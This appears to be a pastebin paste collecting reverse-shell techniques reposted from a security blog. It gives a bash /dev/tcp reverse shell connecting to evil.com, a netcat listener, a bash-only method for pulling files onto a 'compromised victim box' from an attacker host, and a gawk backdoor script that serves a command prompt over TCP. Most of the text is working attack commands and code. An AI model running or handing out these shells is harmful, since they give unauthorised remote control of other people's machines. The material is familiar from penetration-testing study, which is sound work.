SHOW:
|
|
- or go back to the newest paste.
1 | ============================================ | |
2 | www.techgaun.com | |
3 | Reverse shell examples from http://www.gnucitizen.org/blog/reverse-shell-with-bash/ including those from comments | |
4 | www.techgaun.com | |
5 | ============================================ | |
6 | ||
7 | Although netcat is very useful, and you may have to use it in most cases, here is a simple technique which emulates what netcat does but it relies on bash only. Let’s see how. | |
8 | ||
9 | In step one we start a listening service on our box. We can use netcat, or whatever you might have at hand. | |
10 | ||
11 | $ nc -l -p 8080 -vvv | |
12 | ||
13 | On the target we have to perform some bash-fu. We will create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor. | |
14 | ||
15 | $ exec 5<>/dev/tcp/evil.com/8080 | |
16 | $ cat <&5 | while read line; do $line 2>&5 >&5; done | |
17 | ||
18 | ------------- | |
19 | ||
20 | Transfer a file using HTTP: Say you have compromised a victim box and want to transfer a file to the victim. | |
21 | ||
22 | 1. Put the file in the web root of the attacker box (I’m thinking of the web server in backtrack. | |
23 | 2. Start up the web server on the attacker box | |
24 | 3. On the victim box do: | |
25 | ||
26 | (echo -e "GET /filename_you_are_moving HTTP/0.9\r\n\r\n" \ | |
27 | 1>&3 & cat 0<&3) 3 /dev/tcp/AttackerIP/80 \ | |
28 | | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; \ | |
29 | do read i; done; cat) > local_filename | |
30 | ||
31 | Credit where credit is due: | |
32 | http://www.pebble.org.uk/linux/bashbrowser | |
33 | ||
34 | ------------- | |
35 | Reverse shell in gawk | |
36 | #!/usr/bin/gawk -f | |
37 | #!/usr/bin/gawk -f | |
38 | ||
39 | BEGIN { | |
40 | Port = 8080 | |
41 | Prompt = "bkd> " | |
42 | ||
43 | Service = "/inet/tcp/" Port "/0/0" | |
44 | while (1) { | |
45 | do { | |
46 | printf Prompt |& Service | |
47 | Service |& getline cmd | |
48 | if (cmd) { | |
49 | while ((cmd |& getline) > 0) | |
50 | print $0 |& Service | |
51 | close(cmd) | |
52 | } | |
53 | } while (cmd != "exit") | |
54 | close(Service) | |
55 | } | |
56 | } | |
57 | ||
58 | - | macuberg |
58 | + | |
59 | www.techgaun.com |